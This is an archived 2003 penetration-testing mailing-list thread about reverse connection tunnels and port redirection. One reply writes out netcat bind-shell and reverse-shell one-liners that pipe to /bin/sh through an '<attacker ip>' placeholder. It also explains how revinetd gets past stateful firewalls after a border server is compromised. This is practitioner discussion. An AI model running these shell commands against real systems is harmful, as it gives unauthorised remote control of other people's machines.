Penetration Testing mailing list archives
RE: command-line reverse connection tunnel?
From: "Steven Gill" <gman1120 () hotmail com>
Date: Sun, 16 Mar 2003 22:26:33 -0500
Yes, you can use netcat to send a shell back, but it is a pain to use it for port redirection. E.G. for a shell you can:
nc -l -p <port> -e /bin/sh ornc <attacker ip> 1234 | /bin/sh | nc <attacker ip> 1235 and have stdin and stdout connected to the above ports respectively. But we want to use more robust services other than shell, such as getting GUI on Windows via terminal services or other more complex protocols.
Lets take for example a service on a machine that is not nat'd but a border server we can compromise has access to it.
You can use rinetd, fpipe, stunnel, etc for forward redirection. In these cases, there needs to be 2 holes punched through on the server, 1 for the shell used to compromised the server (like www or telnet) and then the port for the redirector to listen on. Revinetd is used for port redirection where the server appears to be the initiator of the connectivity. You theoretically only need one port open in the forward direction which is the shell. All other connectivity is intiated outbound from the server, so a stateful firewall would see the port redirector traffic as NEW in the connection table from the server, allowing us to utilize more liberal rule sets that we know most organizations allow.
Now I know revinetd is not the only thing to use for it. It was brought to my attention that socat can be used for this, but I wanted a tool that was just used for reverse port forwarding and was intuitive to use.
I hope this answers your question. Steve
From: "Filip Maertens" <filip () securax be> To: "'Steven Gill'" <gman1120 () hotmail com>,<pen-test () securityfocus com> Subject: RE: command-line reverse connection tunnel? Date: Sat, 15 Mar 2003 23:57:32 +0100 >have successfully tested it in a pen test stituation in the lab for doing >reverse connectivity. I think this would be a valuable tool for all people I beg to differ. What exactly is different from using netcat listeners on both, attack-client and target machine? All in all, using a reverse telnet technique using netcat isn't very much a big an issue? I think this is a handy tool, but I would like to emphasize one can also use netcat in doing so (if this had been mentioned before in the "old posts", disregard this post, since I didn't followed this thread). Fil -- Filip Maertens @ Home http://www.compsec.be ---------------------------------------------------------------------------- Did you know that you have VNC running on your network? Your hacker does. Plug your security holes now! Download a free 15-day trial of VAM: http://www2.stillsecure.com/download/sf_vuln_list.html
_________________________________________________________________MSN 8 helps eliminate e-mail viruses. Get 2 months FREE*. http://join.msn.com/?page=features/virus
----------------------------------------------------------------------------Did you know that you have VNC running on your network? Your hacker does. Plug your security holes now! Download a free 15-day trial of VAM:
http://www2.stillsecure.com/download/sf_vuln_list.html
Current thread:
- Re: command-line reverse connection tunnel? Steven Gill (Mar 14)
- RE: command-line reverse connection tunnel? Filip Maertens (Mar 16)
- RE: Netstumbling - FBI response Greg Reber (Mar 17)
- <Possible follow-ups>
- RE: command-line reverse connection tunnel? Steven Gill (Mar 17)
- RE: command-line reverse connection tunnel? Paul Bakker (Mar 18)
- RE: command-line reverse connection tunnel? the1 (Mar 18)
- RE: command-line reverse connection tunnel? Filip Maertens (Mar 16)